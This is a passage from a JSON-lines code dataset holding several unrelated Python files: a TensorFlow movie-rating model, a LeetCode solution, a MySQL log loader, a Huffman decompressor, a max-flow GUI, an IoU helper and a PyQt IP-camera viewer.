ast.literal_eval(companies_text)\r\n\r\n for genre in genre_array:\r\n genres_set.add(genre['id'])\r\n\r\n for company in company_array:\r\n companies_set.append(company['id'])\r\n \r\n\r\n #need to be parsed, to float32\r\n orig_title = row[8]\r\n overview = row[9]\r\n\r\n #추측값\r\n vote_average = row[22]\r\n vote_count = row[23]\r\n\r\n #이미지?\r\n\r\n #test\r\n x_train_text.append(title + ' ' + overview)\r\n y_train_point[index] = (float(vote_average))\r\n index += 1\r\n\r\n\r\n\r\nbudget_avg = budget_total/index\r\nrevenue_avg = revenue_total/index\r\n\r\nfor row in range(index):\r\n if x_train_others[i][2] == 0:\r\n x_train_others[i][2] = revenue_avg\r\n if x_train_others[i][0] == 0:\r\n x_train_others[i][0] = budget_avg\r\n \r\n# convert set into list\r\n\r\ngenres_set = list(genres_set)\r\ncompanies_counter = Counter(companies_set)\r\ncompanies_set = list()\r\n\r\nfor k, v in companies_counter.most_common(100):\r\n companies_set.append(k)\r\n\r\n# genre one-hot encode\r\nx_train_genres = np.zeros((row_count, len(genres_set)))\r\nfor i in range(len(x_genres_text)):\r\n genre_array = ast.literal_eval(x_genres_text[i])\r\n\r\n for genre in genre_array:\r\n idx = genres_set.index(genre['id'])\r\n if idx >= 0:\r\n x_train_genres[i][idx] = 1\r\n\r\n# company one-hot encode\r\nx_train_companies = np.zeros((row_count, len(companies_set)))\r\nfor i in range(len(x_companies_text)):\r\n companies_array = ast.literal_eval(x_companies_text[i])\r\n\r\n for company in companies_array:\r\n try:\r\n idx = companies_set.index(company['id'])\r\n x_train_companies[i][idx] = 1\r\n except:\r\n pass\r\n\r\n# Text 준비\r\ncontents = tool.cut(x_train_text, 6)\r\nmax_document_length = 256\r\nx, vocabulary, vocab_size = tool.make_input(contents,max_document_length)\r\n\r\nx_train, x_test, y_train, y_test = x[list(range(5000))+list(range(-2500,0))], x[5000:6000], y_train_point[list(range(5000))+list(range(-2500,0))], y_train_point[5000:6000]\r\n\r\n#train reshape\r\nx_train = 
x_train.astype(np.float32)\r\nx_train = x_train.reshape(x_train.shape[0], 16, 16, 1)\r\ny_train = y_train.reshape(y_train.shape[0], 1)\r\n\r\n#test reshape\r\nx_test = x_test.astype(np.float32)\r\nx_test = x_test.reshape(x_test.shape[0], 16, 16, 1)\r\ny_test = y_test.reshape(y_test.shape[0], 1)\r\n\r\n\r\n# Text CNN\r\nX = tf.placeholder(tf.float32, [None, 16, 16, 1])\r\nY = tf.placeholder(tf.float32, [None, 1])\r\nis_training = tf.placeholder(tf.bool)\r\n\r\nL1 = tf.layers.conv2d(X, 32, [3, 3], activation=tf.nn.relu)\r\nL1 = tf.layers.max_pooling2d(L1, [2, 2], [2, 2])\r\nL1 = tf.layers.dropout(L1, 0.7, is_training)\r\n\r\nL2 = tf.layers.conv2d(L1, 64, [3, 3], activation=tf.nn.relu)\r\nL2 = tf.layers.max_pooling2d(L2, [2, 2], [2, 2])\r\nL2 = tf.layers.dropout(L2, 0.7, is_training)\r\n\r\nL3 = tf.contrib.layers.flatten(L2)\r\nL3 = tf.layers.dense(L3, 128, activation=tf.nn.relu)\r\nL3 = tf.layers.dropout(L3, 0.5, is_training)\r\n\r\nL4 = tf.contrib.layers.flatten(L3)\r\nL4 = tf.layers.dense(L4, 256, activation=tf.nn.relu)\r\nL4 = tf.layers.dropout(L4, 0.5, is_training)\r\n\r\nmodel = tf.layers.dense(L4, 1, activation=None)\r\n\r\n#CNN End\r\n\r\n#Image CNN\r\nx_image_train, x_image_test = x_train_images[list(range(5000))+list(range(-2500,0))], x_train_images[5000:6000]\r\n\r\nX_image = tf.placeholder(tf.float32, [None, IMAGE_WIDTH, IMAGE_HEIGHT, 3])\r\n\r\nis_training = tf.placeholder(tf.bool)\r\n\r\nL1_image = tf.layers.conv2d(X_image, 32, [3, 3], activation=tf.nn.relu)\r\nL1_image = tf.layers.max_pooling2d(L1_image, [2, 2], [2, 2])\r\nL1_image = tf.layers.dropout(L1_image, 0.7, is_training)\r\n\r\nL2_image = tf.layers.conv2d(L1_image, 64, [3, 3], activation=tf.nn.relu)\r\nL2_image = tf.layers.max_pooling2d(L2_image, [2, 2], [2, 2])\r\nL2_image = tf.layers.dropout(L2_image, 0.7, is_training)\r\n\r\nL3_image = tf.contrib.layers.flatten(L2_image)\r\nL3_image = tf.layers.dense(L3_image, 128, activation=tf.nn.relu)\r\nL3_image = tf.layers.dropout(L3_image, 0.5, 
is_training)\r\n\r\nL4_image = tf.contrib.layers.flatten(L3_image)\r\nL4_image = tf.layers.dense(L4_image, 128, activation=tf.nn.relu)\r\nL4_image = tf.layers.dropout(L4_image, 0.5, is_training)\r\n\r\nimage_model = tf.layers.dense(L4_image, 1, activation=None)\r\n\r\n# Linear Regression (Genre)\r\nx_genre_train, x_genre_test = x_train_genres[list(range(5000))+list(range(-2500,0))], x_train_genres[5000:6000]\r\n\r\nX_genre = tf.placeholder(tf.float32, [None, x_train_genres.shape[1]])\r\n\r\nW_g1 = tf.Variable(tf.random_uniform([x_train_genres.shape[1], x_train_genres.shape[1]], -0.1, 0.1))\r\nW_g2 = tf.Variable(tf.random_uniform([x_train_genres.shape[1], 1], -0.1, 0.1))\r\nb_g = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\r\n\r\nhypothesis_g = tf.matmul(tf.matmul(X_genre, W_g1), W_g2) + b_g\r\n\r\n#Linear Regression (Company)\r\nx_company_train, x_company_test = x_train_companies[list(range(5000))+list(range(-2500,0))], x_train_companies[5000:6000]\r\n\r\nX_company = tf.placeholder(tf.float32, [None, x_train_companies.shape[1]])\r\n\r\nW_c1 = tf.Variable(tf.random_uniform([x_train_companies.shape[1], x_train_companies.shape[1]], -0.1, 0.1))\r\nW_c2 = tf.Variable(tf.random_uniform([x_train_companies.shape[1], 1], -0.1, 0.1))\r\nb_c = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\r\n\r\nhypothesis_c = tf.matmul(tf.matmul(X_company, W_c1), W_c2) + b_c\r\n\r\n# Linear regression (budget, popularity, revenue, runtime)\r\nx_other_train, x_other_test = x_train_others[list(range(5000))+list(range(-2500,0))], x_train_others[5000:6000]\r\n\r\nX_other = tf.placeholder(tf.float32, [None, 4])\r\nW1 = tf.Variable(tf.random_uniform([4, 16], -0.01, 0.01))\r\nW2 = tf.Variable(tf.random_uniform([16, 1], -0.01, 0.01))\r\nb = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\r\n\r\nhypothesis = tf.matmul(tf.matmul(X_other, W1), W2) + b\r\n\r\n\r\n# Final\r\nfinal = hypothesis*2 + model*2 + hypothesis_g + hypothesis_c * 3 #+ image_model\r\n\r\n#vote_average 0 ~ 10\r\ncost = 
tf.reduce_mean(tf.square(final - Y))\r\noptimizer = tf.train.AdamOptimizer(0.0005).minimize(tf.reduce_mean(tf.square(final - Y) + tf.nn.l2_loss(W_c2) * 0.01 + tf.nn.l2_loss(W_c1) * 0.01 + tf.nn.l2_loss(W_g1) * 0.01 + tf.nn.l2_loss(W_g2) * 0.01 + tf.nn.l2_loss(W1) * 0.01 + tf.nn.l2_loss(W2) * 0.01 ))\r\n#optimizer = tf.train.AdamOptimizer(0.0005).minimize(cost)\r\n\r\n#########\r\n# 신경망 모델 학습\r\n######\r\ninit = tf.global_variables_initializer()\r\nsess = tf.Session()\r\nsess.run(init)\r\n\r\nbatch_size = 25\r\ntotal_batch = int(x_train.shape[0]/batch_size)\r\nmin_cost = 0.7\r\n\r\nfor i in range(500):\r\n init = tf.global_variables_initializer()\r\n sess = tf.Session()\r\n sess.run(init)\r\n for epoch in range(5000):\r\n total_cost = 0\r\n \r\n for i in range(total_batch):\r\n batch_xs, batch_ys = x_train[i*batch_size:(i+1)*batch_size], y_train[i*batch_size:(i+1)*batch_size]\r\n _, cost_val = sess.run([optimizer, cost],\r\n feed_dict={X: batch_xs,\r\n X_other: x_other_train[i*batch_size:(i+1)*batch_size],\r\n X_image: x_image_train[i*batch_size:(i+1)*batch_size],\r\n X_genre: x_genre_train[i*batch_size:(i+1)*batch_size],\r\n X_company: x_company_train[i*batch_size:(i+1)*batch_size],\r\n Y: batch_ys,\r\n is_training: True})\r\n total_cost += cost_val\r\n \r\n print('Epoch:', '%04d' % (epoch + 1),\r\n 'Avg. 
cost =', '{:.4f}'.format(total_cost / total_batch))\r\n \r\n print('test set cost\\n')\r\n test_cost = sess.run([cost], feed_dict={X: x_test, X_other: x_other_test, X_genre:x_genre_test, X_company: x_company_test, X_image: x_image_test, Y:y_test, is_training: False})\r\n print(test_cost)\r\n \r\n print('min_cost: ', min_cost)\r\n if test_cost[0] <= min_cost:\r\n min_cost = test_cost\r\n saver = tf.train.Saver()\r\n saver.save(sess, './best_model')\r\n \r\nfor i in range(100):\r\n print(i, 'real : ', y_test[i])\r\n print(sess.run([final], feed_dict={X: x_test[i:i+1], X_other: x_other_test[i:i+1], X_image: x_image_test[i:i+1], X_company:x_company_test[i:i+1], X_genre: x_genre_test[i:i+1], Y: y_test[i:i+1], is_training: False}))\r\n\r\nprint('test set cost\\n')\r\nprint(sess.run([cost], feed_dict={X: x_test, X_other: x_other_test, X_genre:x_genre_test, X_company: x_company_test, X_image: x_image_test, Y:y_test, is_training: False}))","sub_path":"Movie_Prediction(원본)/Example/Example2_0.948/main_model_train.py","file_name":"main_model_train.py","file_ext":"py","file_size_in_byte":10533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441233977","text":"# Source : https://leetcode.com/problems/unique-binary-search-trees/\n# Author : Phat Nguyen\n# Date : 2015-03-25\n\n\"\"\"\nPROBLEM:\nGiven n, how many structurally unique BST's (binary search trees) that store values 1...n?\n\nFor example,\nGiven n = 3, there are a total of 5 unique BST's.\n\n 1 3 3 2 1\n \\ / / / \\ \\\n 3 2 1 1 3 2\n / / \\ \\\n 2 1 2 3\n\nSOLUTION:\n\n\"\"\"\n\nclass Solution:\n # @return an integer\n def numTrees(self, n):\n a = [1, 1, 2, 5]\n if n <= 3: return a[n]\n for i in range(4, n + 1):\n num = 0\n mid = (i-1)/2\n for j in range(0, i):\n num += a[j] * a[i - j - 1]\n a.append(num)\n return 
a[n]\n","sub_path":"py/96.py","file_name":"96.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"576068069","text":"#!/usr/bin/env python3\n\n'''\n Log Loader\n Written by Jacob Sorensen\n 05 November 2019\n\n A quick tool to load Humble Pie stats from its log into the\n MySQL DB on borfaxer.com\n'''\n\nimport argparse\nfrom datetime import datetime\nimport json\nimport logging\nimport mysql.connector\nimport os\nimport sys\n#import time\n\ndescription = \"Log Loader\"\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('--conf', required=False, default='/etc/conf/lifeline/lifeline_conf.json', help='config file path')\n\n args = parser.parse_args()\n\n config = json.load(open(args.conf, 'r'))\n\n # Double check the logging path exists, create if it doesn't\n\n if not os.path.exists(config['logging']['path']):\n os.makedirs(config['logging']['path'])\n\n log_file = config['logging']['path'] + '/' + config['logging']['filename']['log_loader']\n logging.basicConfig(filename=log_file,\n format=config['logging']['format'],\n level=logging.INFO)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))\n logging.info('Starting %s with logging level set to %s', description, logging.getLevelName(logging.getLogger().getEffectiveLevel()))\n logging.info('Read config file %s', args.conf)\n\n '''\n There are two activities to perform:\n 1) Dig through the log and extract the data that\n should be in the DB\n 2) Insert the values (ignoring duplicates)\n '''\n\n # Stage 1: Collect the data from logs\n hp_log_filename = log_file = config['logging']['path'] + '/' + config['logging']['filename']['humble_pie']\n\n # Stage 2: Insert the data\n db = mysql.connector.connect(user = config['mysql']['user'],\n host = config['mysql']['host'],\n password = config['mysql']['password'],\n database = config['mysql']['database'])\n 
db_cursor = db.cursor()\n last_entry_cursor = db.cursor(buffered=True)\n\n # IGNORE tells MySQL to skip duplicate rows without erroring\n\n insert_sql = (\"INSERT IGNORE INTO lifeline_data\"\n \"(timestamp, ping, downwidth, upwidth, source_ip, source_machine, test_server)\"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s)\")\n\n source_ip = ''\n source_machine = config['source_machine']\n logging.info('Using \\'%s\\' as the source machine', source_machine)\n\n last_entry_sql = \"SELECT max(timestamp) FROM lifeline_data WHERE source_machine LIKE '{}'\".format(source_machine)\n last_entry_cursor.execute(last_entry_sql)\n last_entry = None\n for (timestamp, ) in last_entry_cursor:\n last_entry = timestamp.strftime('%Y-%m-%d %H:%M:%S')\n logging.info('Last entry in the DB for %s is from %s', source_machine, last_entry)\n\n log_data = []\n\n with open(hp_log_filename, 'r') as hp_log:\n for line in hp_log:\n if 'Your IP: ' in line:\n old_source_ip = source_ip\n source_ip = line.split(':')[4].strip()\n if old_source_ip != source_ip:\n logging.info('Changing source_ip from %s to %s', old_source_ip, source_ip)\n elif \"Could not report to \" in line:\n #logging.info('Parsing data: \\'%s\\'', '{' + line.split('{')[1])\n jd = json.loads('{' + line.split('{')[1])\n timestamp_object = datetime.fromtimestamp(jd['timestamp'])\n formatted_time = timestamp_object.strftime('%Y-%m-%d %H:%M:%S')\n if formatted_time > last_entry:\n data_tuple = (formatted_time,\n jd['ping'],\n jd['downwidth'],\n jd['upwidth'],\n source_ip,\n source_machine,\n jd['test_server'])\n logging.info('Inserting data for timestamp %s into %s:%s:%s', formatted_time, config['mysql']['host'], config['mysql']['database'], 'lifeline_data')\n db_cursor.execute(insert_sql, data_tuple)\n\n db.commit()\n db_cursor.close()\n db.close()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"log_loader.py","file_name":"log_loader.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"283953001","text":"# UID: 180128022\r\n\r\n# Importing Pickle module\r\nimport pickle, time, sys, os\r\n\r\nclass HuffmanDecompress:\r\n def __init__(self, Dictionary, Code): \r\n self.Dictionary = Dictionary\r\n self.Code = Code\r\n \r\n def Convert(self): \r\n Binary = \"\"\r\n for b in self.CodeDecompressed:\r\n Str = bin(b)\r\n Str = Str[2:] \r\n Padding = \"\"\r\n for zero in range(0, 8 - len(Str)):\r\n Padding += \"0\" \r\n Str = Padding + Str\r\n Binary += Str\r\n self.Binary = Binary\r\n \r\n def CodeReader_ReaderDict(self): # Reading the compressed file\r\n CodeDecompressed = open(self.Code, \"rb\")\r\n CodeDecompressed = CodeDecompressed.read()\r\n self.CodeDecompressed = CodeDecompressed\r\n DictDecompressed = open(self.Dictionary, \"rb\")\r\n DictDecompressed = pickle.load(DictDecompressed)\r\n self.DictDecompressed = DictDecompressed\r\n \r\n def Decoder(self): \r\n FinalStr = dict((value, key) for key, value in self.DictDecompressed.items())\r\n StrDecoded = \"\"\r\n ToCheck = \"\"\r\n for element in self.Binary:\r\n ToCheck += element\r\n try:\r\n char = FinalStr[ToCheck]\r\n StrDecoded += char\r\n ToCheck = \"\"\r\n except KeyError: continue\r\n OriginalStr = StrDecoded.replace(\"EOF\",\"\")\r\n filename, file_extension = os.path.splitext(self.Code)\r\n infile = open(\"{}-decompressed.txt\".format(filename), \"w\")\r\n infile.write(OriginalStr) \r\n infile.close()\r\n \r\nStartTimeTotal = time.clock()\r\nsymbol = sys.argv[1]\r\nfilename, file_extension = os.path.splitext(symbol)\r\nInstanceofHuffman = HuffmanDecompress('{}-symbol-model.pkl'.format(filename), symbol)\r\nreaderdict_codereader = InstanceofHuffman.CodeReader_ReaderDict()\r\nbinaryconvert = InstanceofHuffman.Convert()\r\nStartTime = time.clock()\r\ntodecode = 
InstanceofHuffman.Decoder()\r\nStopTime = time.clock()\r\nprint(\"Time taken to decode\", StopTime-StartTime)\r\nStopTimeTotal = time.clock()\r\nprint(\"Total Time taken for Decompression\", StopTimeTotal-StartTimeTotal)","sub_path":"huff-decompress.py","file_name":"huff-decompress.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216363354","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\n\n\ndef format_data(df):\n temp = []\n idx = df.index\n for i in idx:\n temp.append([[item] for item in df.iloc[i]])\n temp = np.array(temp, dtype=float)\n return temp\n\n\ndef load_clean_data(csv_file):\n # Load all data\n data = pd.read_csv(csv_file)\n # Remove Unnecessary columns\n clean_data = data.drop(labels=['Unnamed: 0', 'Unnamed: 0.1','Unnamed: 0.1.1',\n 'date', 'readings', 'sensors', 'time'],\n axis=1)\n return clean_data\n\n\ndef shuffle_split_dataset(X, y):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,\n random_state=42, shuffle=True)\n return X_train, y_train, X_test, y_test\n\n\ndef extract_categories(y):\n cats = []\n for element in y:\n if element not in cats:\n cats.append(element)\n return cats\n\n\n\ndef load_preprocess_data():\n csv_file1 = 'Dataset/Aruba/BDL_test2.csv'\n csv_file2 = 'Dataset/Aruba/BDL_train2.csv'\n # Create a clean dataset\n clean_data_1 = load_clean_data(csv_file1)\n clean_data_2 = load_clean_data(csv_file2)\n clean_data = pd.concat([clean_data_1, clean_data_2])\n # Shuffle Data\n clean_data_sampled = clean_data.sample(frac=1).reset_index(drop=True)\n return clean_data\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199136431","text":"from scipy import optimize\nimport 
numpy as np\nfrom .pondering import proximity_ponderation,outlier_ponderation\nfrom math import pi\n\ndef trigono_plus_lineal(A,t):\n #Declares an equiation to model the behavior of the star\n return A[0]*np.cos(A[2]*t)+A[1]*np.sin(A[2]*t)+A[3]+A[4]*t\n\ndef error_function(A,t,y,w):\n #Returns the error of the function\n return (trigono_plus_lineal(A,t)-y)*w\n\ndef jac_errfunc(A,t,y,w):\n jac_err= np.zeros((5,t.shape[0]))\n jac_err[0,:]= np.cos(A[2]*t)\n jac_err[1,:]= np.sin(A[2]*t)\n jac_err[2,:]= (-A[0]*np.sin(A[2]*t)+A[1]*np.cos(A[2]*t))*t\n jac_err[3,:]= 1.0\n jac_err[4,:]= t\n return jac_err*w\n\ndef fit(data,cycles_guess=2.0):\n #Fits the funtion to the points while mainting least error\n data= np.array(data)\n xdata= data[:,0]\n ydata= data[:,1]\n ponderation= proximity_ponderation(xdata)*outlier_ponderation(ydata)\n mean= np.sum(ydata*ponderation)/np.sum(ponderation)\n stdev= np.std(ydata*ponderation)/np.sum(ponderation)\n rangx= np.amax(xdata)-np.amin(xdata)\n w0= cycles_guess*2*pi/rangx\n A0= [stdev,stdev,w0,mean,0.0]\n fit= optimize.leastsq(error_function, A0, args=(xdata,ydata,ponderation), Dfun=jac_errfunc, col_deriv=True)\n function= lambda t: trigono_plus_lineal(fit[0],t)\n fit= list(fit)\n fit.append(function)\n return fit\n","sub_path":"varstarscan/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461919419","text":"from PyQt5.QtWidgets import QApplication, QLabel, QGroupBox, QFrame, QVBoxLayout, QDialog, QRadioButton, QGridLayout\n\nclass View(QDialog):\n def __init__(self):\n super(View, self).__init__(None)\n self.createOutputWidget()\n self.createDataWidget()\n self.createGraphWidget()\n self.createConsoleWidget()\n\n mainLayout = QGridLayout()\n mainLayout.addWidget(self.OutputWidget, 0, 0, 3, 3)\n mainLayout.addWidget(self.DataWidget, 0, 4, 3, 1)\n mainLayout.addWidget(self.GraphWidget, 4, 0, 2, 3)\n 
mainLayout.addWidget(self.ConsoleWidget, 4, 4, 2, 1)\n\n self.setLayout(mainLayout)\n\n def createOutputWidget(self):\n self.OutputWidget = QGroupBox(\"Output\")\n\n temp = QRadioButton(\"1\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.OutputWidget.setLayout(layout)\n\n def createDataWidget(self):\n self.DataWidget = QGroupBox(\"Dataset\")\n\n temp = QRadioButton(\"2\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.DataWidget.setLayout(layout)\n \n def createGraphWidget(self):\n self.GraphWidget = QGroupBox(\"Graph\")\n\n temp = QRadioButton(\"3\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.GraphWidget.setLayout(layout)\n \n def createConsoleWidget(self):\n self.ConsoleWidget = QGroupBox(\"Console\")\n\n temp = QRadioButton(\"4\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.ConsoleWidget.setLayout(layout)\n\ndef main():\n main_view = QApplication([])\n view = View()\n view.resize(700, 700)\n view.show()\n main_view.exec_()\n\nif __name__ == \"__main__\":\n main()","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"379624837","text":"from tkinter import *\nfrom tkinter import ttk\n\nclass Aplicacion():\n def __init__(self):\n self.raiz = Tk()\n self.raiz.title(\"Flujo Maximo\")\n self.raiz.resizable(False,False)\n self.grafo = [[0,30,15,0,0,0,0,0,0,0],\n [50,0,0,7,40,0,0,0,0,0],\n [0,0,0,20,0,11,0,12,0,0],\n [0,5,0,0,0,18,0,0,25,0],\n [0,0,0,0,0,0,11,11,11,17],\n [20,17,0,0,5,0,0,22,0,0],\n [0,18,0,27,0,0,0,0,1,0],\n [0,0,0,0,0,0,0,0,0,0],\n [24,0,33,0,0,0,20,0,0,0],\n [42,0,0,0,10,0,20,33,0,0]]\n self.pares = [0 for x in range(len(self.grafo))]\n###################################################Variables\n self.n1 = IntVar(value=9)\n self.inicial = self.n1.get()\n self.n2 = IntVar(value=0)\n 
self.final = self.n2.get()\n self.total = IntVar(value=0)\n#Elementos de Tkinter\n self.etiq2 = ttk.Label(self.raiz, text=\"CASAS: 0-9\")\n self.etiq3 = ttk.Label(self.raiz, text=\"Casa Inicial:\")\n self.dist = ttk.Entry(self.raiz, textvariable=self.n1, width=10)\n self.etiq4 = ttk.Label(self.raiz, text=\"Casa Final:\")\n self.coste = ttk.Entry(self.raiz, textvariable=self.n2, width=10)\n self.etiq5 = ttk.Label(self.raiz, text=\"Flujo Maximo:\")\n self.etiq6 = ttk.Label(self.raiz, textvariable=self.total, foreground=\"yellow\", background=\"black\", borderwidth=5, anchor=\"e\")\n self.separ1 = ttk.Separator(self.raiz, orient=HORIZONTAL)\n self.boton1 = ttk.Button(self.raiz, text=\"Calcular\", command=self.calcular)\n self.boton2 = ttk.Button(self.raiz, text=\"Salir\", command=quit)\n \n self.etiq2.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.etiq3.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.dist.pack(side=TOP, fill=X, expand=True, padx=20, pady=5)\n self.etiq4.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.coste.pack(side=TOP, fill=X, expand=True, padx=20, pady=5)\n self.etiq5.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.etiq6.pack(side=TOP, fill=BOTH, expand=True, padx=20, pady=5)\n self.separ1.pack(side=TOP, fill=BOTH, expand=True, padx=5, pady=5)\n self.boton1.pack(side=LEFT, fill=BOTH, expand=True, padx=10, pady=10)\n self.boton2.pack(side=RIGHT, fill=BOTH, expand=True, padx=10, pady=10) \n self.raiz.mainloop()\n######################################################\n def flujoMasCorto(self):\n grafo = self.grafo\n pares = self.pares\n inicial2 = int(self.inicial)#\n cola = []\n visitados = [False for x in range(len(grafo))]\n cola.append(inicial2)\n visitados[inicial2] = True\n while len(cola):\n nodo = cola.pop(0)\n for principal,adyacente in enumerate(grafo[nodo]):\n if visitados[principal] == False and adyacente > 0:\n cola.append(principal)\n visitados[principal] = True\n 
pares[principal] = nodo\n if visitados[self.final] == True:\n return True\n return False\n def flujoMaximo(self):\n flujoTotal = 0\n pares = self.pares\n grafo = self.grafo\n while self.flujoMasCorto():\n aux = self.final\n k = float('inf')\n #K\n while aux != self.inicial:\n k = min(k,grafo[pares[aux]][aux])\n aux = pares[aux]\n flujoTotal += k\n v = self.final\n #sumando y restando\n while v != self.inicial:\n u = pares[v]\n grafo[u][v] -= k\n grafo[v][u] += k\n v = pares[v]\n return flujoTotal\n#####################################################\n \n#Boton Calcular\n def calcular(self):\n error_dato = False\n total = 0\n #asegurarse de que sea un int\n try:\n n1 = int(self.n1.get())\n n2 = int(self.n2.get())\n except:\n error_dato = True\n if not error_dato:\n self.inicial = self.n1.get()\n self.final = self.n2.get()\n total = self.flujoMaximo()\n print(total)#print en consola\n self.total.set(total)#print en el label negro\n else:\n self.total.set(\"¡ERROR!\")#otros valores\n#Funcion principal\ndef main():\n mi_app = Aplicacion()\n return 0\n#condicional para prevenir una doble llamada desde otro archivo python\nif __name__ == '__main__':\n main()\n","sub_path":"flujomaximo.py","file_name":"flujomaximo.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27518771","text":"import numpy as np\n\n\ndef iou(nboxes, kboxes):\n '''\n nbox:numpy array,shape(n, 4,):xmin,ymin,xmax,ymax, or (4,)\n input box\n kboxes:numpy array,shape (k,4):xmin,ymin,xmax,ymax\n input ground truth boxes\n 返回值:\n ious: numpy.array, shape (n, k)\n '''\n\n if nboxes.ndim == 2 and nboxes.shape[-1]:\n n = nboxes.shape[0]\n k = kboxes.shape[0]\n nboxes = nboxes[:, np.newaxis, :]\n # nboxes = np.tile(nboxes, (1, k, 1))\n kboxes = kboxes[np.newaxis, :, :]\n # kboxes = np.tile(kboxes, (n, 1, 1))\n\n box_area = (nboxes[..., 2] - nboxes[..., 0] + 1) * (nboxes[..., 3] - nboxes[..., 1] + 1)\n area = 
(kboxes[..., 2] - kboxes[..., 0] + 1) * (kboxes[..., 3] - kboxes[..., 1] + 1)\n xx1 = np.maximum(nboxes[..., 0], kboxes[..., 0])\n yy1 = np.maximum(nboxes[..., 1], kboxes[..., 1])\n xx2 = np.minimum(nboxes[..., 2], kboxes[..., 2])\n yy2 = np.minimum(nboxes[..., 3], kboxes[..., 3])\n\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n inter = w * h\n ious = inter / (box_area + area - inter)\n return ious\n\n\ndef avg_iou(bboxes, clusters):\n max_ious =[np.max(iou(bboxes[i], clusters)) for i in range(bboxes.shape[0])]\n return np.mean(max_ious)","sub_path":"research/object_detection/dataset_tools/utils/avg_iou.py","file_name":"avg_iou.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197824387","text":"import sys\nimport time\nimport urllib.request\nimport cv2\nfrom PyQt5.QtWidgets import QApplication, QDialog, QWidget, QMessageBox, QFileDialog, QGraphicsScene\nfrom PyQt5.QtGui import QPixmap, QImage\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, QTimer, QRectF, QThread, Qt\nfrom collections import deque\nfrom ui_mainwindow2 import Ui_MainWindow\nsys.path.append(\"D:/data/Python/\") # needed to import 'pythonOnvifDomecam' if not in the same directory\nfrom pythonOnvifDomecam import MegapixelDomeCamera as cam, config\n\nclass Thread(QThread):\n ''' Thread(xui): Thread to capture the individual frames which are then passed as QImage to the interrupt routine. 
\n If record flag (ui.record) is True, video will be recorded to file ui.out''' \n def __init__(self):\n super().__init__()\n # ui = callingClass # class that sets the recording flag and defines the output file\n # self.cap = cv2.VideoCapture(0) # To read built-in web cam\n self.cap = cv2.VideoCapture('rtsp://'+config.host+':'+str(config.rtsp_port)+config.rtsp_url) # To read stream of IP camera\n fac = 0.5 # reduce image resolution for video file\n self.size = (int(self.cap.get(3)*fac), int(self.cap.get(4)*fac))\n self.que = deque(maxlen=100)\n\n changePixmap = pyqtSignal(QImage)\n\n def run(self):\n while (self.cap.isOpened()):\n ret, frame = self.cap.read()\n if ret:\n resized = cv2.resize(frame, self.size, interpolation = cv2.INTER_AREA)\n self.que.append(resized)\n # rgbImage = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n rgbImage = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)\n if ui.record:\n # write the video frame to file\n ui.out.write(resized)\n myImage = QImage(rgbImage.data, rgbImage.shape[1], rgbImage.shape[0], QImage.Format_RGB888)\n myImage = myImage.scaled(640*2, 480*2, Qt.KeepAspectRatio)\n self.changePixmap.emit(myImage)\n ui.countDown -= 1\n if ui.countDown == 0:\n ui.writeVideoBuffer()\n\nclass MyWindow(Ui_MainWindow,QWidget): # Inheritage from QWidget is important for pyqtSignal\n timer = QTimer()\n\n def myModifications(self):\n self.pushButton1.clicked.connect(self.onPushButton1)\n self.pushButton2.clicked.connect(self.onPushButton2)\n self.pushButton3.clicked.connect(self.onPushButton3)\n self.pushButton4.clicked.connect(self.onPushButton4)\n self.pushButtonReithalle.clicked.connect(self.onPushButtonReithalle)\n self.pushButtonParken1.clicked.connect(self.onPushButtonParken1)\n self.pushButtonParken2.clicked.connect(self.onPushButtonParken2)\n self.pushButtonTest.clicked.connect(self.onTest)\n self.pushButtonRecord.clicked.connect(self.onRecord)\n self.pushButtonSnapshot.clicked.connect(self.onPushButtonSnapshot)\n 
